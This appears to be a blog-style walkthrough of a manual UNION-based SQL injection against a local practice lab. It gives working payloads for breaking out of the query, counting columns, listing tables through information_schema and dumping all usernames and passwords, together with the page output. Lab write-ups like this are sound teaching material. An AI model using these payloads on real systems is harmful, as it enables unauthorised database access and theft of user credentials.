Commemorating my first manual SQL injection

Start by submitting ?id=1 to locate the injection point (in this challenge the injectable parameter is ?id=1).

Once that is found, the injection can begin.

http://127.0.0.2:777/Less-1/?id=1'

The page responds with

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

A syntax error, so there is probably a vulnerability here. The fragment ''1'' LIMIT 0,1' also reveals how the input is embedded: the id is wrapped in single quotes and followed by LIMIT 0,1, so the quote we inject has to be closed or the remainder of the statement commented out.

http://127.0.0.2:777/Less-1/?id=1'--+

Normal output is returned. The -- starts a MySQL comment, and the + is URL-decoded to the space that MySQL requires after --, so everything the application appends after our input (the closing quote and LIMIT 0,1) is ignored.

Your Login name:Dumb
Your Password:Dumb

Use order by to find how many columns the query returns

?id=1'order by 3--+

Here order by 3 returns normal output while order by 4 raises an error, so the query returns 3 columns.

Now a union select can be used

?id=888' union select 1,2,3--+

(888 can be any id that does not exist in the database; since no row matches, the page displays the row produced by the UNION instead.)

The output is

Your Login name:2
Your Password:3

so the display positions are columns 2 and 3.

Query the current database name

?id=888' union select 1,2,database()--+

Your Login name:2
Your Password:security

Next, list the table names in that database

?id=888' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security'--+

Your Login name:2
Your Password:emails,referers,uagents,users

There is clearly a users table; list its columns

?id=888' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'--+

Your Login name:2
Your Password:id,username,password

It has username and password columns, so dump them

?id=888' union select 1,group_concat(username),group_concat(password) from security.users--+

group_concat packs every username into display column 2 and every password into display column 3, so the whole table comes back in a single row.
